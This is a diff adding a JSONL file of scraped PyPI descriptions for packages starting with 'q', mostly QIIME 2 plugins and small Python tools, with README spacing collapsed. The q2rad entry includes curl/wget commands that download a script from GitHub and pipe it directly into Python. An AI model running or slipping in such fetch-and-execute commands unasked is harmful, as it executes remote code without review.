diff --git "a/train/q_entries_out.jsonl" "b/train/q_entries_out.jsonl" new file mode 100644--- /dev/null +++ "b/train/q_entries_out.jsonl" @@ -0,0 +1,3998 @@ +{"package": "q", "pacakge-description": "No description available on PyPI."} +{"package": "q1pulse", "pacakge-description": "No description available on PyPI."} +{"package": "q1q1-dictionary", "pacakge-description": "No description available on PyPI."} +{"package": "q1simulator", "pacakge-description": "No description available on PyPI."} +{"package": "q1ss", "pacakge-description": "This library contains experimental implementations of quantum one-shot signatures by authors from the QSig Commission and other contributors, with special focus on blockchain technology.ContentsInstallUsageAPILicenseInstallThe library is currently in pre-alpha development, but you can install the latest release fromPyPIas follows:$pipinstall--upgradeq1ssLow-level operations are vectorised usingnumpy, which is a required dependency of this library.Ifnumbais installed, it is automatically used to JIT-compile certain low-level operations for additional performance:$pipinstall--upgradenumbaIfcupyis installed additionally tonumba, GPU acceleration can be used for certain operations:$pipinstall--upgradecupyUsageComing soon.APIFor the full API documentation, seehttps://q1ss.readthedocs.io/LicenseLGPL \u00a9 Hashberg Ltd and 20squares UG."} +{"package": "q2", "pacakge-description": "# q2A reinforcement learning framework and command line tool.## Get it` pip install q2 q2--help`## Use itMake a folder,cdto it, then run` q2 init `to generate a new reinforcement learning project.## DocsDocumentation is available athttps://q2.readthedocs.io/.## DevelopYou\u2019ll need Python >= 3.5 (this is because q2 makes use of type annotations)Clone this repositoryI recommend setting up a virtual env in which to develop:python -m venv envpip install -r requirements.txtTo test out the command line tools from your working copy of q2, run` pip install-e. `then run` q2--help`to test that it worked.## ContributingIf you want to submit a bug fix or minor change, feel free to make a pull request.If you want to discuss bigger improvements, send an email to tdbalcorn at gmail dot com."} +{"package": "q26-alphatrading", "pacakge-description": "Q26_QuanTesterQ26 Backtest System is a financial investment simulation tool dedicated for algorithmic traders developped in Python 3.Main features :Python based : very simple configuration file & strategies design modelHigh personnalisation and very wide way of use of the toolEnvironment free of any development bias :No access to future data during the simulationPre-Backtest data preparation :Missing data filling modelsPossibility to resample data to any timeframeMultiple asset synchronizationHigh realism portfolio :Leverage, margin constraints, other security constraintsHigh precision symbols characteristics : lot size, minimum lot size, open/close/off trading hours, fees ...Fully personnalisable strategies & outputsParallelisable backtest, performance optimisation & MC approachAnd a lot more features ...And a lot of new features soon !To get more informations about the Backtest System and the other products of Q26, you can visit our web site by clickinghere. 
Get access to the detailled documentationhereGetting the Q26 Backtest SystemDownload the code by cloning the git repository usinggit clone https://github.com/LoannData/Q26_QuanTester.gitor install the latest stable version usingpip install q26-quanTesterHands-onHereyou can find a tutorial which shows how to hands-on the Q26 Backtest system"} +{"package": "q26-quanTester", "pacakge-description": "Q26_BacktestSystemQ26 Backtest System is a financial investment simulation tool dedicated for algorithmic traders developped in Python 3.Main features :Python based : very simple configuration file & strategies design modelHigh personnalisation and very wide way of use of the toolEnvironment free of any development bias :No access to future data during the simulationPre-Backtest data preparation :Missing data filling modelsPossibility to resample data to any timeframeMultiple asset synchronizationHigh realism portfolio :Leverage, margin constraints, other security constraintsHigh precision symbols characteristics : lot size, minimum lot size, open/close/off trading hours, fees ...Fully personnalisable strategies & outputsParallelisable backtest, performance optimisation & MC approachAnd a lot more features ...And a lot of new features soon !To get more informations about the Backtest System and the other products of Q26, you can visit our web site by clickinghere. Get access to the detailled documentationhereGetting the Q26 Backtest SystemDownload the code by cloning the git repository using$ git clone https://github.com/LoannData/Q26_BacktestSystem.gitHands-onHereyou can find a tutorial which shows how to hands-on the Q26 Backtest system"} +{"package": "q26-quanTrader", "pacakge-description": "Q26_QuanTraderQ26 QuanTrader is a financial investment system dedicated to algorithmic trading developers who only whant to focus on the development of their trading strategies and not on all the structural framework around. I recommend to the users to use this project with theQ26 QuanTesterdedicated to trading strategies development. This tool is developed thanks to Python 3.Main featuresPython based : very simple confiduration file & strategies design model.Trading strategies developed withQ26 QuanTesterare immediately compatible with this tool.Multi-brokerage choice : With connexion to IBKR (TWS) and MT4 trading platforms, the user has choice to a very large panel of compatible brokers.Precise trading actions record : Every action of the trading algorithm is stored in a log and can be used for futher studies.A lot more interesting features are coming !To get more informations about the Backtest System and the other products of Q26, you can visit our web site by clickinghere. 
Get access to the detailled documentation [here][2]Getting the Q26 Trading SystemDownload the code by cloning the git repository usinggit clone https://github.com/LoannData/Q26_QuanTrader.gitor install the latest stable version usingpip install q26-quanTraderHands-on(Soon) you can find a tutorial which shows how to hands-on the Q26 Trading System"} +{"package": "q2-brocc", "pacakge-description": "No description available on PyPI."} +{"package": "q2-clawback", "pacakge-description": "No description available on PyPI."} +{"package": "q2data2docx", "pacakge-description": "http://d2d.penta.by/#Tutorial"} +{"package": "q2db", "pacakge-description": "The light Python DB API wrapper with some ORM functions (MySQL, PostgreSQL, SQLite)Quick start (run demo files)- in docker:gitclonehttps://github.com/AndreiPuchko/q2db&&cdq2db/database.docker\n./up.sh\n./down.sh- on your system:pipinstallq2db\ngitclonehttps://github.com/AndreiPuchko/q2db&&cdq2db# sqlite:python3./demo/demo.py# mysql and postgresql:pipinstallmysql-connector-pythonpsycopg2-binarypushddatabase.docker&&docker-composeup-d&&popdpython3./demo/demo_mysql.py\npython3./demo/demo_postgresql.pypushddatabase.docker&&docker-composedown-v&&popdFeatures:Connectfromq2db.dbimportQ2Dbdatabase_sqlite=Q2Db(\"sqlite3\",database_name=\":memory:\")# or justdatabase_sqlite=Q2Db()database_mysql=Q2Db(\"mysql\",user=\"root\",password=\"q2test\"host=\"0.0.0.0\",port=\"3308\",database_name=\"q2test\",)# or justdatabase_mysql=Q2Db(url=\"mysql://root:q2test@0.0.0.0:3308/q2test\")database_postgresql=Q2Db(\"postgresql\",user=\"q2user\",password=\"q2test\"host=\"0.0.0.0\",port=5432,database_name=\"q2test1\",)Define & migrate database schema (ADD COLUMN only).q2db.schemaimportQ2DbSchemaschema=Q2DbSchema()schema.add(table=\"topic_table\",column=\"uid\",datatype=\"int\",datalen=9,pk=True)schema.add(table=\"topic_table\",column=\"name\",datatype=\"varchar\",datalen=100)schema.add(table=\"message_table\",column=\"uid\",datatype=\"int\",datalen=9,pk=True)schema.add(table=\"message_table\",column=\"message\",datatype=\"varchar\",datalen=100)schema.add(table=\"message_table\",column=\"parent_uid\",to_table=\"topic_table\",to_column=\"uid\",related=\"name\")database.set_schema(schema)INSERT, UPDATE, DELETEdatabase.insert(\"topic_table\",{\"name\":\"topic 0\"})database.insert(\"topic_table\",{\"name\":\"topic 1\"})database.insert(\"topic_table\",{\"name\":\"topic 2\"})database.insert(\"topic_table\",{\"name\":\"topic 3\"})database.insert(\"message_table\",{\"message\":\"Message 0 in 0\",\"parent_uid\":0})database.insert(\"message_table\",{\"message\":\"Message 1 in 0\",\"parent_uid\":0})database.insert(\"message_table\",{\"message\":\"Message 0 in 1\",\"parent_uid\":1})database.insert(\"message_table\",{\"message\":\"Message 1 in 1\",\"parent_uid\":1})# this returns False because there is no value 2 in topic_table.id - schema works!database.insert(\"message_table\",{\"message\":\"Message 1 in 1\",\"parent_uid\":2})database.delete(\"message_table\",{\"uid\":2})database.update(\"message_table\",{\"uid\":0,\"message\":\"updated message\"})Cursorcursor=database.cursor(table_name=\"topic_table\")cursor=database.cursor(table_name=\"topic_table\",where=\" name like '%2%'\",order=\"name desc\")cursor.insert({\"name\":\"insert record via cursor\"})cursor.delete({\"uid\":2})cursor.update({\"uid\":0,\"message\":\"updated message\"})cursor=database.cursor(sql=\"select name from 
topic_table\")forxincursor.records():print(x)print(cursor.r.name)cursor.record(0)['name']cursor.row_count()cursor.first()cursor.last()cursor.next()cursor.prev()cursor.bof()cursor.eof()"} +{"package": "q2-dbbact", "pacakge-description": "q2-dbbactAQiime2plugin fordbBactFeatures:Differential abundance testing usingCalourrank-mean differential abundance test (withdsFDRcorrection).dbBact term enrichment from differntial abundance results of qiime2 (i.e. songbird/q2-aldex2/ancom/dacomp or the built in rank-mean test).Create a wordcloud of dbBact terms for a given feature table.Generate an interactive heatmap visualization for a feature table. The heatmap provides links to dbBact annotations for each ASV.Generate Venn diagram for a differential abundance result and a given dbBact term.Background dbBact term enrichment analysis for experiments without controls (i.e. what terms are enriched in the bacteria in a given feature table compared to all dbBact experiments of a given type).Examples:Run the q2-dbBact enrichment pipeline for a given feature table:Our input is a feature table and a metadata file with a given column dividing our samples into two groups.q2-dbBact will detect ASVs different between the two groups, and identify dbBact terms enriched in one of the two groups compared to the otherqiime dbbact enrich-pipeline --i-table cfs-merged.qza --m-metadata-file map.cfs.txt --p-field Subject --output-dir cfs-pipelineDraw an interactive heatmapThis creates a zoomable heatmap with a list of dbBact annotation for each bacteria that is clicked. Useful for exploring your sequencing results and getting a feeling for what is going on (contaminations, bacterial sources, groups of samples, etc.)Our input is a feature table and a metadata file with a given column dividing our samples into two groups.qiime dbbact heatmap --i-table cfs-table.qza --i-repseqs cfs-rep-seqs.qza --i-taxonomy cfs-taxonomy.qza --m-metadata-file map.cfs.txt --p-sort-field Subject --o-visualization heatmap-cfsDraw a dbBact terms wordcloud for the set of bacteria in a feature-tableThe wordcloud is created for all the bacteria in the feature table.The output wordcloud words are dbBact terms associated with the bacteria. The word size corresponds to the F-score (recall and precision) of the term. Blue terms are positively associated (i.e. appear in COMMON/DOMINANT/HIGHER IN annotations) where as red terms (preceeded by a \"-\") are negatively associated (i.e. appear in LOWER IN annotations).qiime dbbact draw-wordcloud-vis --i-data cfs-table.qza --i-repseqs cfs-rep-seqs.qza --o-visualization wordcloud-cfsIdentify differentially abundant bacteria between two sample groupsq2-dbBact utilizes the non-parametric (permutation based) Calour diff_abundance() function. By default it uses a rank-mean test with dsFDR multiple hypothesis correction.The test can also be performed as a paired test using an additional metadata pair-field (permutations are performed only between samples sharing the same pair-field value).qiime dbbact diff-abundance --i-table cfs-merged.qza --m-metadata-file map.cfs.txt --p-field Subject --p-alpha 0.1 --p-val1 Patient --p-val2 Control --o-diff diff-cfs-dsfdrIdentify and plot enriched dbBact terms between two groups of bacteriaPerformed on the output of a differential-abundance test. 
q2-dbBact supports the following formats:songbirdancomq2-aldex2dbBact diff-abundanceany tsv fileThis command identifies dbBact terms the are significantly more associated with bacteria from one group compared to the otherqiime dbbact enrichment --i-diff diff-cfs-dsfdr.qza --p-source dsfdr --o-enriched enriched-cfs-dsfdrThe output can be visualized (and the complete table saved) using the visualization command:qiime dbbact plot-enrichment --i-enriched enriched-cfs-dsfdr.qza --o-visualization barplot-enriched-cfs-dsfdr --p-labels CFS ControlVenn diagram for examining term distribution in the two groupsInput is the results of a differential abundance analysis (which provides two ASV groups - positive and negative effect size), and a dbBact term.The venn diagram shows how many of the ASVs in each group have the term, as well as how many total dbBact ASVs have the term associated.qiime dbbact venn --i-diff diff-cfs-dsfdr.qza --p-terms \"small village\" --p-source dsfdr --p-label1 Control --p-label2 CFS --o-visualization venn-cfs-human-village"} +{"package": "q2-greengenes2", "pacakge-description": "No description available on PyPI."} +{"package": "q2gui", "pacakge-description": "The light Python GUI builder (currently based on PyQt6)How to startWith docker && x11:gitclonehttps://github.com/AndreiPuchko/q2gui.git# sudo if necessarycdq2gui/docker-x11&&./build_and_run_menu.shWith PyPI package:poetrynewproject_01&&cdproject_01&&poetryshell\npoetryaddq2guicdproject_01\npython-mq2gui>example_app.py&&pythonexample_app.pyExplore sources:gitclonehttps://github.com/AndreiPuchko/q2gui.gitcdq2gui\npip3installpoetry\npoetryshell\npoetryinstall\npython3demo/demo_00.py# All demo launcherpython3demo/demo_01.py# basic: main menu, form & widgetspython3demo/demo_02.py# forms and forms in formpython3demo/demo_03.py# grid form (CSV data), automatic creation of forms based on datapython3demo/demo_04.py# progressbar, data loading, sorting and filteringpython3demo/demo_05.py# nonmodal formpython3demo/demo_06.py# code editorpython3demo/demo_07.py# database app (4 tables, mock data loading) - requires a q2db packagepython3demo/demo_08.py# database app, requires a q2db package, autoschemademo/demo_07.py screenshot=======Build standalone executable(The resulting executable file will appear in the folder dist/)One filepyinstaller-Fdemo/demo.pyOne directorypyinstaller-Ddemo/demo.py"} +{"package": "q2-itsxpress", "pacakge-description": "This is the end of life version 1 of q2_itsxpress and the command line version of ITSxpress. See\n1.8.1-EOL branch of ITSxpress. The new version 2 of ITSxpress, has the Qiime2 plugin built in with command line version of ITSxpress.See ITSxpress 1.8.1-EOL branch here:ITSxpress-1.8.1-EOLAuthorsAdam R. Rivers, US Department of Agriculture, Agricultural Research ServiceKyle C. Weber, US Department of Agriculture, Agricultural Research ServiceSveinn V. Einarsson, US Department of Agriculture, Agricultural Research ServiceCitationRivers AR, Weber KC, Gardner TG et al. ITSxpress: Software to rapidly trim\ninternally transcribed spacer sequences with quality scores for marker gene\nanalysis. F1000Research 2018, 7:1418. doi:10.12688/f1000research.15704.1IntroductionThe internally transcribed spacer (ITS) is a region between the small subunit\nand large subunit rRNA genes. In is a commonly used phylogenetic marker for\nFungi and other Eukaryotes. The ITS contains the 5.8s gene and two variable\nlength spacer regions. 
In amplicon sequencing studies it is common practice to\ntrim off the conserved (SSU, 5,8S or LSU) regions. Bengtsson-Palme et al. (2013)\npublished a software packageITSxto do this.Q2-ITSxpress extends this work by rapidly trimming FASTQ sequences within\nQiime2. Q2-ITSxpress is the Qiime2 plugin version of the stand alone command\nline utilityITSxpress. Q2_ITSxpress is designed to support the calling of\nexact sequence variants rather than OTUs. This newer method of sequence\nerror-correction requires quality score data from each sequence, so each input\nsequence must be trimmed. ITSxpress makes this possible by taking FASTQ data,\nde-replicating the sequences then identifying the start and stop sites using\nHMMSearch. Results are parsed and the trimmed files are returned. The ITS1,\nITS2 or the entire ITS region including the 5.8s rRNA gene can be selected.\nITSxpress uses the hmm models from ITSx so results are nearly identical.Requirements/DependenciesQiime2 is required to run Q2-itsxpress (for stand alone software seeITSxpress)To install Qiime2 follow these instructions:https://docs.qiime2.org/2022.8/install/This end of life version 1 of q2-itsxpress and ITSxpress isONLYcompatible with Qiime2 version 2022.8. So make sure to follow the link above.We are using mamba because it resolves packages better and faster, but conda can be substituted.Information on installing mamba or micromamba (either highly recommended) can be found here:mamba installation guideQ2-itsxpress plugin installationExample on how to install and create new Qiime2-2022.8 environment.wgethttps://data.qiime2.org/distro/core/qiime2-2022.8-py38-osx-conda.ymlmambaenvcreate-nqiime2-2022.8--fileqiime2-2022.8-py38-osx-conda.ymlActivate the Qiime2 conda environmentmambaactivateqiime2-2022.8Install Q2_itsxpress usingBioConda. Be sure to install itsxpress and q2_itsxpress in the Qiime2 environment using the following commands.mambainstall-cbiocondaitsxpress==1.8.1pipinstallq2-itsxpressIn your Qiime2 environment, refresh the plugins.qiimedevrefresh-cacheCheck to see if the ITSxpress plugin is installed. You should see an output similar to the image below.qiimeitsxpressUsageWithin Qiime2 you can trim paired-end or single-end reads using these commandsqiimeitsxpresstrim-pairqiimeitsxpresstrim-pair-output-unmergedqiimeitsxpresstrim-singleqiime itsxpress trim-singleThis command takes single-end data and returns trimmed reads. The sequence may\nhave been merged previously or have been generated from a long read technology\nlike PacBio. Merged and long reads trimmed by this function can be used by\nDeblur but only long reads (not merged reads) trimmed by this function should\nbe passed to Dada2. Its statistical model for estimating error rates was not\ndesigned for pre-merged reads.Command-requirementDescription\u2013i-per-sample-sequencesThe artifact that contains the sequence file(s).Either Joined Paired or just a single fastq.One file sequence in the qza data folder.\u2013p-regionThe regions ITS2, ITS1, and ALL.\u2013p-taxaSelect the taxonomic group sequenced: A, B, C, D, E, F, G, H, I, L, M, O, P,\nQ, R, S, T, U, V, ALL.\u2013p-threadsThe amount of threads to use.\u2013o-trimmedThe resulting trimmed sequences from ITSxpress in a qza format.\u2013cluster-idThe percent identity for clustering reads, set to 1 for exact dereplication.qiime itsxpress trim-pairThis command takes paired-end data and returns merged, trimmed reads. The\nmerged reads trimmed by this function can be used by Deblur but not\nDada2. 
Its statistical model for estimating error rates was not\ndesigned for pre-merged reads, instead useqiime itsxpress trim-pair-output-unmerged.Command-requirementDescription\u2013i-per-sample-sequencesThe artifact that contains the sequence file(s).Either Joined Paired or just a single fastq.One file sequence in the qza data folder.\u2013p-regionThe regions ITS2, ITS1, and ALL.\u2013p-taxaSelect the taxonomic group sequenced: A, B, C, D, E, F, G, H, I, L, M, O, P,\nQ, R, S, T, U, V, ALL.\u2013p-threadsThe amount of threads to use.\u2013o-trimmedThe resulting trimmed sequences from ITSxpress in a qza format.\u2013cluster-idThe percent identity for clustering reads, set to 1 for exact dereplication.qiime itsxpress trim-pair-output-unmergedThis command takes paired-end data and returns unmerged, trimmed reads. The\nmerged reads trimmed by this function can be used by Dada2 but not Deblur.\nFor Deblur useqiime itsxpress trim-pair.Command-requirementDescription\u2013i-per-sample-sequencesThe artifact that contains the sequence file.Only paired will work.Two file sequences in the qza data folder.\u2013p-regionThe regions ITS2, ITS1, and ALL.\u2013p-taxaSelect the taxonomic group sequenced: A, B, C, D, E, F, G, H, I, L, M, O, P,\nQ, R, S, T, U, V, ALL.\u2013p-threadsThe amount of threads to use.\u2013o-trimmedThe resulting trimmed sequences from ITSxpress in a qza format.\u2013cluster-idThe percent identity for clustering reads, set to 1 for exact dereplication.Taxa KeyAAlveolataBBryophytaCBacillariophytaDAmoebozoaEEuglenozoaFFungiGChlorophyta (green algae)HRhodophyta (red algae)IPhaeophyceae (brown algae)LMarchantiophyta (liverworts)MMetazoaOOomycotaPHaptophyceae (prymnesiophytes)QRaphidophyceaeRRhizariaSSynurophyceaeTTracheophyta (higher plants)UEustigmatophyceaeALLAllExampleUse case: Trimming the ITS2 region from a fungal amplicon\nsequencing dataset with a PairedSequencesWithQuailty qza using two cpu threads.\nThe example file used is in the Tests folder under paired.qza.qiimeitsxpresstrim-pair--i-per-sample-sequences~/parired.qza--p-regionITS2\\--p-taxaF--p-threads2--o-trimmed~/Desktop/out.qzaLicense informationThis software is a work of the United States Department of Agriculture,\nAgricultural Research Service and is released under a Creative Commons CC0\npublic domain attribution."} +{"package": "q2k", "pacakge-description": "No description available on PyPI."} +{"package": "q2-metabodisttrees", "pacakge-description": "No description available on PyPI."} +{"package": "q2-micom", "pacakge-description": "A QIIME 2 plugin for MICOM.InstallationYou will need an existing QIIME 2 environment. Follow the instructions on (how to install QIIME 2) otherwise.q2-micomis compatible with all QIIME 2 distributions.\nLet's assume that environment was calledqiime2-2023.9for all further steps.Add q2-micom to the QIIME 2 environmentThis will be the same step for any supported QIIME 2 version but will vary depending on your operating system\n(similar to the normal QIIME 2 installation).Linuxwgethttps://raw.githubusercontent.com/micom-dev/q2-micom/main/q2-micom-linux.yml\ncondaenvupdate-nqiime2-2023.8-fq2-micom-linux.yml# OPTIONAL CLEANUPrmq2-micom-*.ymlMacwgethttps://raw.githubusercontent.com/micom-dev/q2-micom/main/q2-micom-osx.yml\ncondaenvupdate-nqiime2-2023.9-fq2-micom-osx.yml# OPTIONAL CLEANUPrmq2-micom-*.ymlFinally, you activate your environment.condaactivateqiime2-2023.9q2-micomwill now install an open source solver that can be used with MICOM. 
If you use MICOM\nregularly we do recommend to obtain an academic license for CPLEX or Gurobi which will be faster.Install a faster solver (recommended but optional)CPLEXQIIME 2 versions before 2021.4 are only compatible with CPLEX 12.10 or earlier (later version require at least Python 3.7).After registering and downloading the CPLEX studio for your OS unpack it (by running the provided installer) to a directory of your choice (we will assume it's calledibm).Now install the CPLEX python package into your activated environment:pipinstallibm/cplex/python/3.8/x86-64_linuxSubstitute3.8with the Python version in your QIIME 2 environment,3.6for QIIME 2 up to 2021.2 and3.8for QIIME 2 2021.4 and newer.\nSubstitutex86-64_linuxwith the folder corresponding to your system (there will only be one subfolder in that directory).GurobiGurobi can be installed with conda.condainstall-cgurobigurobiYou will now have to register the installation using your license key.grbgetkeyYOUR-LICENSE-KEYFinish your installationIf you installedq2-micomin an already existing QIIME 2 environment, update the plugin cache:condaactivateqiime2-2023.9# or whatever you called your environmentqiimedevrefresh-cacheYou are now ready to runq2-micom!UsageHere is a graphical overview of aq2-micomanalysis.The best way to get started is to work through thecommunity tutorial.Supported QIIME 2 versionsq2-micomis tested against:the currentQIIME 2 versionthe previous versionIt should also work withthedevelopment versionHowever, this may occasionally break. Checkhere for the current status.ReferencesMICOM: Metagenome-Scale Modeling To Infer Metabolic Interactions in the Gut MicrobiotaChristian Diener, Sean M. Gibbons, Osbaldo Resendis-AntoniomSystems 5:e00606-19https://doi.org/10.1128/mSystems.00606-19"} +{"package": "q2-mislabeled", "pacakge-description": "q2-mislabeled is a QIIME 2 plugin that facilitates detection of mislabeled and contaminated samples. 
It does so by using q2-sample-classifier, and SourceTracker2."} +{"package": "q2-omxware", "pacakge-description": "No description available on PyPI."} +{"package": "q2rad", "pacakge-description": "The RAD (rapid application development) system.(code less, make more)Based on:q2db (https://pypi.org/project/q2db)q2gui (https://pypi.org/project/q2gui)q2report (https://pypi.org/project/q2report)Read the docsSystem requirements:Python >= 3.8.1onLinuxand Python >=3.11 make sure you have pip and virtualenv installed, if not:sudoaptinstallpython3-pippython3-virtualenvInstall & run - Launcher (https://github.com/AndreiPuchko/q2radlauncher)Go to the download pagehttps://github.com/AndreiPuchko/q2radlauncher/releases/latestand download file for your OS:Windows: q2radlauncher.exeLinux: q2radlauncher-linux.zipmacOS: q2radlauncher-macos.zipInstall & run - Python scriptWindowswgethttps://raw.githubusercontent.com/AndreiPuchko/q2rad/main/install/get-q2rad.py-Oget-q2rad.py|pyget-q2rad.py;delget-q2rad.pyLinuxwgethttps://raw.githubusercontent.com/AndreiPuchko/q2rad/main/install/get-q2rad.py-O-|python3macOScurlhttps://raw.githubusercontent.com/AndreiPuchko/q2rad/main/install/get-q2rad.py|python3Install & run - terminalWindows (Powershell)mkdirq2rad;`cdq2rad;`py-mpipinstall--upgradepip;`py-mvenvq2rad;q2rad/scripts/activate;`py-mpipinstall--upgradeq2rad;`q2radLinuxsudoaptinstallpython3-venvpython3-pip-y&&\\mkdir-pq2rad&&\\cdq2rad&&\\python3-mpipinstall--upgradepip&&\\python3-mvenvq2rad&&\\sourceq2rad/bin/activate&&\\python3-mpipinstall--upgradeq2rad&&\\q2radmacOSmkdir-pq2rad&&\\cdq2rad&&\\python3-mpipinstall--upgradepip&&\\python3-mvenvq2rad&&\\sourceq2rad/bin/activate&&\\python3-mpipinstall--upgradeq2rad&&\\q2radConcept:Application as a databaseForms:# may have main menu (menubar) definitions# may be linked to database tableLines:# form fields(type of data and type of form control) and# layout definitions# when form is linked to database - database columns definitionsActions:# applies for database linked forms# may be standard CRUD-action# or# run a script (run reports, forms and etc)# or# may have linked subforms (one-to-many)Modules:# python scriptsQueries:# query development and debugging toolReports:# multiformat (HTML, DOCX, XLSX) reporting tool"} +{"package": "q2report", "pacakge-description": "The light Python report builder.Converts data into formatted text (HTML,DOCX,XLSX):data={'data_source1':[{'col1':'value row1',....},...],'data_source2':[{'col_1':'valie_row1',....},...],}Available formatting (styling options):\"style\":{\"font-family\":\"Arial\",\"font-size\":\"10pt\",\"font-weight\":\"normal\",\"border-width\":\"0 0 0 0\",\"padding\":\"0.05cm 0.05cm 0.05cm 0.05cm\",\"text-align\":\"left\",\"vertical-align\":\"top\"}ConceptThe report definition consists of sections (Report, Pages, Columns, Rows, Cells).Each section inherits style from previous and may override some styling options.see examples in foldertest_dataReport:# contains basic stylePages:# page & margins sizesColumns:# columns widths - exact, % or autowidthRows:# rows heights - auto, exact, min or max# can be linked to data and then have header, footer and grouping subsections#Cells# contains simple text and data links - {col1}# and aggregate functions - {sum:coll}# support html formatting with
# cells may be merged (span)Rows:Cells....Columns:....Pages:........"} +{"package": "q2-SCNIC", "pacakge-description": "No description available on PyPI."} +{"package": "q2terminal", "pacakge-description": "Interaction with a terminal sessionfromq2terminal.q2terminalimportQ2Terminalimportsyst=Q2Terminal()t.run(\"programm\",echo=True)assertt.exit_code!=0assertt.run(\"$q2 = 123\")==[]assertt.run(\"echo $q2\")==[\"123\"]if\"win32\"insys.platform:t.run(\"notepad\")assertt.exit_code==0"} +{"package": "q2-umap", "pacakge-description": "No description available on PyPI."} +{"package": "q3", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q3api", "pacakge-description": "No description available on PyPI."} +{"package": "q3c", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q3dfit", "pacakge-description": "Model astronomical data from integral field spectrographs."} +{"package": "q3huff", "pacakge-description": "No description available on PyPI."} +{"package": "q3huff2", "pacakge-description": "No description available on PyPI."} +{"package": "q3net", "pacakge-description": "No description available on PyPI."} +{"package": "q3rcon", "pacakge-description": "[![Pypi version](http://img.shields.io/pypi/v/acoomans_python_project_template.svg)](https://pypi.python.org/pypi/acoomans_python_project_template)\n[![Pypi license](http://img.shields.io/pypi/l/acoomans_python_project_template.svg)](https://pypi.python.org/pypi/acoomans_python_project_template)\n![Python 3](http://img.shields.io/badge/python-3-blue.svg)## Installpip install q3rconorpython setup.py install## UsageRun console:q3rcon-cli [hostname]Run web server:q3rcon-web \u2013rcon_host HOST \u2013rcon_password PASSWORDand then access the web server at [http://localhost:9344/](http://localhost:9344/)"} +{"package": "q3sim", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "q4n", "pacakge-description": "No description available on PyPI."} +{"package": "q4nwin", "pacakge-description": "No description available on PyPI."} +{"package": "q5", "pacakge-description": "q5Creative coding framework for PythonInstallationYou can install q5 with:pip install q5UsageExamplesSeeexamples.Project Template# -*- coding: utf-8 -*-importq5classApp(q5.BaseApp):defsetup(self):q5.title('q5 app')defupdate(self):passdefdraw(self):q5.background(220)q5.ellipse(0.0,0.0,200.0,200.0)if__name__=='__main__':app=App()app.run()DevelopmentInstall Rust lang:https://www.rust-lang.org/Run commands:pip install setuptools-rust\npython setup.py developLicenseMIT"} +{"package": "q5-django-inlinecss", "pacakge-description": "AboutInlining CSS is necessary for email generation and sending\nbut is currently a surprisingly large hassle.This library aims to make it a breeze in the Django\ntemplate language.UsageStep 1: DependenciesBeautifulSoupcssutilsPython 2.7+,3.4+Django 1.11+Step 2: Install django_inlinecssAdddjango_inlinecssto yoursettings.py:INSTALLED_APPS=('django.contrib.auth','django.contrib.webdesign','django.contrib.contenttypes','...','...','...','django_inlinecss')Step 3: Use the templatetagPlace your CSS file somewhere staticfiles can find itCreate your template:{% load inlinecss %}\n{% inlinecss \"css/extra-padding.css\" %}Something in need of styling.{% endinlinecss %}Step 4: Prepare to be WowedSomething in need of styling.AcknowledgementsThanks to Tanner Netterville for his efforts onPynliner.Thanks to Thomas Yip for his unit tests on thesoupselectmodule. These tests\nhelped on getting the core CSS2 selectors to work.LicenseMIT license. See LICENSE.md for more detail."} +{"package": "q9", "pacakge-description": "No description available on PyPI."} +{"package": "qa", "pacakge-description": "No description available on PyPI."} +{"package": "qa4sm-preprocessing", "pacakge-description": "This package contains functions to preprocess certain data before using them\nin the QA4SM online validation framework.ISMN FRMThis module contains the routine to assign FRM qualifications ISMN sensors.\nThe Quality Indicators (QIs) are based on a Triple Collocation run with\n80% CI between ISMN (0-10 cm, \u201cgood\u201d time stamps), ERA5-Land (\u201cswvl1\u201d) and\nESA CCI SM v06.1 PASSIVE. See./docs/ismn_frm.rstfor more details.CGLS HR SSM SWIRead CGLS HR SSM and SWI images (1km sampling) in netcdf format and convert\nthem to time series.\nThe image reader allows reading/converting data for a spatial subset (bbox) only.\nTime series are stored in 5*5 DEG cell files, i.e. there are~250 000 time seriesstored in one single cell file.Time series reading is done based on cell level. Up to 6 cells are loaded into\nmemory at a time. Theread_areafunction allows reading multiple GPI time series\naround one location at once (and optionally converting them into a single, averaged\nseries, to represent the mean SM for an area).Necessary updatesAt the moment it is only possible to read a single variable. However, in order\nto mask SM time series based in location quality flags, it is necessary to\nread multiple parameters. When passing the averaged time series for an area\ntopytesmofor validation, masking can not be done inpytesmo, but must be done\nbeforehand.NoteThis project has been set up using PyScaffold 4.0.2. 
For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qa4sm-reader", "pacakge-description": "qa4sm_reader is a python package to read and plot the result files of theqa4sm service.InstallationThis package should be installable through pip (not yet tough, see development):pip install qa4sm_readerUsageThis package is used to analyze a qa4sm netCDF output file and produce all relevant plots and maps.Development SetupThe project was setup usingpyscaffoldand closely follows the recommendations.Install DependenciesFor Development we recommend creating acondaenvironment.cd qa4sm-reader\nconda env create # create environment from requirements.rst\nconda activate qa4sm-reader\npython setup.py develop # Links the code to the environmentTo remove the environment again, run:conda deactivate\nconda env remove -n qa4sm_readerCode FormattingTo apply pep8 conform styling to any changed files [we useyapf](https://github.com/google/yapf). The correct\nsettings are already set insetup.cfg. Therefore the following command\nshould be enough:yapf file.py --in-placeTestingFor testing, we usepy.test:pytestThe dependencies are automatically installed bypytest-runnerwhen you run the tests. The test-dependencies are listed in thetestingfield inside the[options.extras_require]section ofsetup.cfg.\nFor some reasons, the dependencies are not installed as expected. To workaround, do:pip install pytest-covThe files used for testing are included in this package. They are however subject to otherterms and conditions.Known IssuesNo known issues - pleaseopen an issuein case you come across a malfunctioning in the package."} +{"package": "qaa", "pacakge-description": "Featuresqaaanalyzes molecular dynamics (MD) trajectories by using joint\ndiagonalization (JADE) to separate the information. The JADE[1]and QAA[2]code are based on the original code written in Matlab.[1]Cardoso, J. F.; Souloumiac, A. \u201cBlind Beamforming for Non-Gaussian\nSignals.\u201d IEE Proc F Radar Signal Process 1993, 140 (6), 362.[2]Ramanathan, A.; Savol, A. J.; Langmead, C. J.; Agarwal, P. K.;\nChennubhotla, C. S. \u201cDiscovering Conformational Sub-States Relevant to Protein\nFunction.\u201d Plos One 2011, 6 (1), e15827.RequirementsPython 3.8+click 7.0+numpy 1.20+scipy 1.6+matplotlib 3.3+scikit-learn 0.24+mdtraj 1.9+nptyping 1.4+holoviews 1.14+InstallationYou can installQuasi-Anharmonic 